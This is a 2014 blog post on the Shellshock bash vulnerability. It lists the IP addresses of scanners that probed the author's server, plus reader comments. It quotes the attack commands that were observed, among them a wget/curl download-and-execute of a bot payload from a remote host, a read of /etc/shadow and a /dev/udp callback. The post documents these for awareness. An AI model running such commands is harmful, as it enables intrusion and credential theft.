In April 2014, the Internet shivered when we faced the “heartbleed” bug in the OpenSSL library. It makes lot of noise across the security community and was even covered by regular media. Such issue could never happen again, right?
Never say never! Last week, a new storm in the Internet with “shellsock” or best known as CVE-2014-6271! This new bug affects the bash UNIX shell. The difference with heartbleed? When you compare them, heartbleed looses definitively its pole position on the top threats. It is very easy to exploit, it affects MANYÂ applications or services that spawn other processes using call like system() on PHP or the well-know mod_cgi provided by Apache. Not only public websites can be affected by also some critical services like:
- the ForceCommand feature in sshd
- scripts executed by unspecified DHCP clients,
- network access control serices
- …
So, any service in which the environment is defined via a bash shell execution. If you need more info about this new threat, google for it!
Some security researchers and bloggers immediately started to scan the Internet to have a better idea of the impact of this vulnerability on public services. Of course, bad guy also started to do the same and my server was hit several times (94). Until today, I detected the following IP addresses:
109.80.232.48 109.95.210.196 119.82.75.205 128.199.223.129 128.204.199.209 166.78.61.142 176.10.107.180 178.32.181.108 2001:4800:7812:514:1b50:2e05:ff04:c849:52116 209.126.230.72 24.251.197.244 54.251.83.67 62.210.75.170 79.99.187.98 80.110.67.10 83.166.234.133 89.207.135.125 89.248.172.139 93.103.21.231
Here is a list of commands/scripts tested:
/bin/ping -c 1 198.101.206.138 /bin/bash -c "echo testing9123123"; /bin/uname -a /sbin/ifconfig /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh" echo -e "Content-Type: text/plain\\n"; echo qQQQQQq /bin/cat /etc/shadow echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444 /bin/bash -c "/usr/bin/wget http://singlesaints.com/firefile/temp?h=rootshell.be -O /tmp/a.pl" /bin/bash -c "wget -q -O /dev/null http://ad.dipad.biz/test/http://leakedin.com/" /bin/bash -c "wget -U BashNslash.http://www.leakedin.com/tag/urls-list/page/97/ 89.248.172.139" wget 'http://taxiairportpop.com/s.php?s=http://brucon.org/'
Personally, I like the one which tries to use the built-in support of sockets via psuedo files like “/dev/[tcp|udp]/<host>/<port>“. This is a nice feature of bash but it is disabled on most distribution (for security reason presicely).
@Rafael, the moment the news got out, people started to write scans. Most of the scans are just to see how much devices are vulnerable, in most cases they only do a ping back to the scanner. Other scans try to copy your paswd or other interesting files. And then there are also the scanners which download (e.g. with wget) a malicious shell and run it
First hit: 25/Sep/2014:07:05:09 +0200
And the counter is growing: 179 probes 🙂
Since when did the scans started?
I almost fell of my chair seeing the last one (BruCON). You might want to check brucon.org if you want to know more about it.